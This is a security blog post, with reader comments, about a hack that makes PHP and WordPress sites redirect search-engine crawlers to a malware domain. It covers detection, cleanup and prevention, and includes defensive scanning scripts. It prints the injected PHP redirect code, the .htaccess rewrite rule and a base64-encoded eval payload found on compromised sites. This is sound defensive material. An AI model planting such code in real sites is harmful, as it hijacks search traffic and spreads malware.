Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Exploit Redirects Googlebot to Malware Sites (Bablo me uk).

   19 Jan 09   Filed in Website exploits

Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/”, followed by a site with a random 6-digit number as its sub-domain name (e.g. http://www. 524045. secki .info/).

I decided to follow the redirects and find out where they led. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. For now, let’s talk about the things webmasters should know about this exploit.

Symptoms

  • PHP-driven site (especially Joomla-driven).
  • Problems getting the site properly indexed by Google: some pages don’t get indexed, some pages disappear from the index. If not yet, it’s only a matter of time.
  • When checking web pages in Unmask Parasites, a chain of two 301 redirects is reported and the first redirect points to “http://bablo .me .uk/”. However, when opening the same pages in a browser, no redirection occurs (even when clicking on Google search results).

Detection

Use a tool that shows HTTP headers and lets you change the User-Agent string, for instance web-sniffer with the Googlebot user agent. If the site is compromised, you’ll see the following lines in the response headers:

HTTP/1.1 301 Moved Permanently
Location: http://bablo .me .uk/

You can also use my Unmask Parasites to detect this exploit. For compromised sites you will see the following chain of redirects:

301 -> http://bablo .me .uk/
301 -> http://www.642366 .sozunu .de/

The second site in the redirection chain will be different for different sites.
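The check described above, requesting the same URL once as Googlebot and once as a browser and comparing the first hop, can be scripted. The following is an added example and not code from the original post or from Unmask Parasites. It uses only Python’s standard library; the embedded HTTP server is a constructed stand-in for a compromised site, and the redirect target http://redirect-target.invalid/ is a placeholder, not the real domain.

```python
"""Cloaking check: does a URL answer a crawler differently than a browser?

Added example. Fetches one URL with two User-Agent strings, never follows
redirects, and reports the status and Location header seen by each.
"""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the first hop is visible to us."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status(url, user_agent, timeout=5):
    """Return (status_code, Location header or None) for a single request."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With redirects disabled, 3xx (and 4xx/5xx) arrive as HTTPError.
        return err.code, err.headers.get("Location")


def check_cloaking(url, crawler_ua=GOOGLEBOT_UA, browser_ua=BROWSER_UA):
    """Compare the crawler's and the browser's first response for one URL.

    Flags the URL when the two differ and the crawler alone gets a redirect,
    which is exactly the user-agent cloaking this post describes.
    """
    crawler = fetch_status(url, crawler_ua)
    browser = fetch_status(url, browser_ua)
    suspicious = crawler != browser and 300 <= crawler[0] < 400
    return {"crawler": crawler, "browser": browser, "suspicious": suspicious}


class _CloakingFixture(BaseHTTPRequestHandler):
    """Constructed stand-in for a compromised site: crawlers get a 301, browsers a page."""

    REDIRECT_TO = "http://redirect-target.invalid/"  # placeholder, not the real attacker host

    def do_GET(self):
        if "Googlebot" in self.headers.get("User-Agent", ""):
            self.send_response(301)
            self.send_header("Location", self.REDIRECT_TO)
            self.end_headers()
            return
        body = b"<html><body>normal page</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_fixture():
    """Start the fixture on a free loopback port and return its base URL."""
    server = HTTPServer(("127.0.0.1", 0), _CloakingFixture)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/" % server.server_address[1]


if __name__ == "__main__":
    base = start_fixture()
    print(check_cloaking(base))
```

Against a real site you would call check_cloaking("http://example.com/") directly; the fixture exists only so the script demonstrates a positive result offline. Note that a clean site can legitimately redirect everyone (for example from http to https), which is why the check requires the crawler’s response to differ from the browser’s rather than merely to be a redirect.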

How to clean up?

I can only guess how the sites were compromised, so here are only general, common-sense instructions:

  1. Search all server directories for suspicious files and remove them.
  2. Search your .php files on the server for the following code

    $agent = $_SERVER['HTTP_USER_AGENT'];
    if (eregi("google", $agent)) {
        header("HTTP/1.1 301");
        header("Location: http://bablo .me .uk/");
        exit();
    }

    and remove it. The real code may vary. Try to search for “bablo”.
    Or just upload a fresh copy from backup.

  3. Check your site again (see the detection section) and, if the exploit persists, you might need to thoroughly check your database for suspicious entries, or restore a backup copy of the database (you have a backup, don’t you?).

How to prevent reinfection?

Most likely some Joomla vulnerability was used to inject the malicious code.

  1. Update Joomla to the most recent version.
  2. Make sure all third party Joomla components are up-to-date.
  3. Read more about Joomla security here: Joomla Administrators Security Checklist
  4. If you are using some in-house PHP scripts, consult the PHP Security Guide
  5. Write protect server files that should not be modified by your web application (644 permissions on *nix)
  6. Check your local computers for spyware and viruses.
  7. Change all passwords.

Hope this helps.

In the next post I’ll talk about my investigation, about the malicious sites and their strange SEO efforts.

Update (January 27, 2009): I’ve just found this post on the Old Ten Speed Gallery site, which was recently hacked and indeed redirected Googlebot to virus sites via bablo .me .uk.

It’s a WordPress site, but the malicious code was not in PHP files. It was in a .htaccess file.

RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://bablo .me .uk/ [R=301,L]

It does the same thing as the PHP code: it redirects search engine crawlers (Googlebot, Yahoo!’s Slurp and msnbot).
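The two forms of the redirect seen on this page, the PHP snippet in the clean-up section and the .htaccess rewrite rule above, can be searched for with a small file scanner. The following is an added example, not code from the original post or from Unmask Parasites. It also unwraps base64_decode() string literals, since the same PHP logic also turns up encoded that way (see the first reader comment below). The sample files and the redirect-target.invalid domain are constructed placeholders.

```python
"""Scan PHP files and .htaccess for user-agent-conditional redirects.

Added example. A PHP file is flagged when it reads HTTP_USER_AGENT, mentions a
crawler name and sends a Location header; base64_decode() payloads are decoded
and scanned the same way. An .htaccess is flagged when a RewriteCond on the
crawler's User-Agent is followed by a RewriteRule to an external URL.
"""
import base64
import os
import re

CRAWLER_RE = re.compile(r"googlebot|google|slurp|msnbot|bingbot", re.I)
UA_RE = re.compile(r"HTTP_USER_AGENT", re.I)
PHP_REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location\s*:", re.I)
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
HTACCESS_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}\s+(\S+)", re.I | re.M)
HTACCESS_RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I | re.M)


def decode_base64_payloads(source):
    """Return the decoded text of every base64_decode('...') literal in source."""
    decoded = []
    for match in B64_CALL_RE.finditer(source):
        blob = re.sub(r"\s+", "", match.group(1))  # payloads are often line-wrapped
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError
            continue
    return decoded


def scan_php(source, depth=0):
    """Return findings for PHP source, following up to three base64 layers."""
    findings = []
    if UA_RE.search(source) and CRAWLER_RE.search(source) and PHP_REDIRECT_RE.search(source):
        findings.append("UA-conditional Location header" + (" (inside base64_decode)" if depth else ""))
    if depth < 3:
        for inner in decode_base64_payloads(source):
            findings.extend(scan_php(inner, depth + 1))
    return findings


def scan_htaccess(source):
    """Return findings for an .htaccess: crawler UA condition followed by an external redirect."""
    findings = []
    for cond in HTACCESS_COND_RE.finditer(source):
        if not CRAWLER_RE.search(cond.group(1)):
            continue
        rule = HTACCESS_RULE_RE.search(source, cond.end())
        if rule and rule.group(1).lower().startswith(("http://", "https://")):
            findings.append("crawler-only RewriteCond redirects to " + rule.group(1))
    return findings


def scan_tree(root):
    """Walk a web root and map each suspicious file path to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if name == ".htaccess":
                hits = scan_htaccess(src)
            elif name.lower().endswith((".php", ".inc", ".phtml")):
                hits = scan_php(src)
            else:
                hits = []
            if hits:
                results[path] = hits
    return results


# Constructed samples (not real files): the cleartext snippet from the post, the
# same logic wrapped in eval(base64_decode()), a legitimate UA check, and an
# .htaccess with and without the injected rules appended at the bottom.
SAMPLE_PHP_PLAIN = """<?php
$agent = $_SERVER['HTTP_USER_AGENT'];
if (eregi("google", $agent)) {header("HTTP/1.1 301");
header("Location: http://redirect-target.invalid/");
exit(); }
"""
_INNER = '$a=$_SERVER[\'HTTP_USER_AGENT\'];if(eregi("google",$a)){header("Location: http://redirect-target.invalid/");exit();}'
SAMPLE_PHP_OBFUSCATED = "<?php eval(base64_decode('%s'));\n" % base64.b64encode(_INNER.encode()).decode()
SAMPLE_PHP_CLEAN = """<?php
// Legitimate use of the User-Agent: log crawler visits, never redirect them
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) { error_log('crawler visit'); }
"""
SAMPLE_HTACCESS_CLEAN = r"""RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""
SAMPLE_HTACCESS_BAD = SAMPLE_HTACCESS_CLEAN + """RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://redirect-target.invalid/ [R=301,L]
"""

if __name__ == "__main__":
    for label, src in (("plain", SAMPLE_PHP_PLAIN), ("obfuscated", SAMPLE_PHP_OBFUSCATED), ("clean", SAMPLE_PHP_CLEAN)):
        print(label, scan_php(src))
    print("htaccess", scan_htaccess(SAMPLE_HTACCESS_BAD), scan_htaccess(SAMPLE_HTACCESS_CLEAN))
```

Run scan_tree("/path/to/webroot") on a copy of the site to get a list of files to inspect. The .htaccess check deliberately keeps the WordPress permalink rules unflagged, which matters given the comments below about sites breaking after too much was deleted from .htaccess; only a crawler-conditioned rule pointing off-site is reported. Anything base64_decode() hides is decoded before matching, so the wrapped variant is caught with the same three conditions as the cleartext one.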

And this exploit worked well for the hackers: they managed to hijack the top two positions in Google search results for the keyword “Old Ten Speed Gallery”.

If you have questions, comments, or just want to share some information, don’t hesitate to leave your messages in the Comments section.


Reader's Comments (20)

  1. |

    Thanks for the information on this attack and the unmaskparasites tool. This one on my sites has proved very ugly — not only did it infect php source files and .htaccess files it inserted code that seemed to be hidden to most of the editors and firefox view source functions; I think because it was before the initial opening tag.

    One additional trick whoever is disseminating this seems to be doing is to insert code like this at the beginning of your php files:
    eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmVnaSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));

    Apparently that eval statement turns into a bunch of spam links.

    So I’d recommend you do a grep search of all source files for base64_decode — the justified uses of this (like by WordPress) will look very different from the line above.

  2. |

    Thanks for this info guys. I used dreamweaver to scan my folder and found the exploit in wp-blog-header.php

    I initially realized a problem when google webmaster tools had lost my site verification. It kept giving me an error of “Can’t find your Domain” and then it would also give an error about a “301 redirect”. I had also lost my #1 keyword placement. I just deleted the exploit and now google tools has verified my site.

    How long did it take for Ten Speed to get his google placement back?

    • |

      I think it took a couple of days. Maybe slightly more. Did you read his email?

      • |

        Ya I read that email. However, when I check web-sniffer again after I deleted the exploit in my wp-blog-header.php I still see this

        301 Moved Permanently

        Moved Permanently
        The document has moved here (bablo .me .uk/).

        Am I missing something else?

        • |

          I can see the redirect in Unmask Parasites too.

          What exactly did you do to remove the exploit? Did you check the .htaccess file?

          • |

            I scanned all my files and found the following code in my wp-blog-header.php

            $agent = $_SERVER['HTTP_USER_AGENT'];
            if (eregi("google", $agent)) {header("HTTP/1.1 301");
            header("Location: http://bablo .me .uk/");
            exit(); }

            I deleted this and reuploaded the clean file. I checked the .htaccess and did not find anything wrong with it.

          • |

            Did you search for the code mentioned in the first comment? It also redirects to the “bablo” site.

            This 301 redirect can be issued at the web server level (.htaccess) or at the script level (inside your .php files).
            The .htaccess file may be located above the web site root directory.

          • |

            Yea I searched for that as well and couldn’t find it. I’ve checked my .htaccess and scanned all my .php files and cannot seem to find any other issue.

          • |

            OK. I checked other sites on your server and they don’t redirect Googlebot anywhere, so this problem is not server-wide.

            Try to create a static .html file in the root directory. Then request it as Googlebot (using web-sniffer, or my tool). If the request is redirected, you should check .htaccess or other Apache-level settings. If it isn’t redirected, you should check .php files for the redirect code.

          • |

            Thanks for all your help Denis. I still get the redirect with the static html file. I checked .htaccess and can’t seem to find any issues. How do I know if it’s an Apache-level setting?

          • |

            You might want to contact your hosting provider. They should know more about details of your Apache settings.

  3. |

    I feel like an idiot now. The .htaccess rewrite was all the way down at the bottom of the page. I had not scrolled all the way down to view it. Problem solved. Thanks

  4. |

    When I deleted the following code from my .htaccess in my root folder (I am using WordPress, not Joomla), my entire site went to a 404 error. I got the homepage back up, but the rest is down.

    Wow. Any advice?

  5. |

    After I deleted the hack code from htaccess, my entire site now gives a 404 error.

    I am using wordpress. Any advice?

    • |

      Many content management systems like Joomla and WordPress use their own Redirect rules in .htaccess files to be able to provide “pretty” permalinks.

      Make sure you don’t remove legitimate rules from .htaccess.

  6. |

    [...] quite well outlined in these two posts I found while analyzing my sites: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” and “Did your WordPress site get hacked?”, rather [...]

  7. |

    Oh this post is a life saver. I’ve been trying to diagnose this problem for months!

    Don’t know how to identify the security hole that allowed access to .htaccess but at least I can remove the malicious code.

    thanks!

  8. |

    I’ve been having this problem for some time now, and most of the time when I make a new post it does not get indexed. Now there are like 16 of them that are not getting indexed, and the list is increasing as the number of posts increases. Please sir, if you do get time, do check my blog.

  9. |

    yeah…That’s really very bad..! I was stuck once…! It totally drops your traffic..!

  10. |

    [...] new “canonical” hack resembles an older “301 redirect” hack where criminals configure compromised sites to redirect search engine crawlers [...]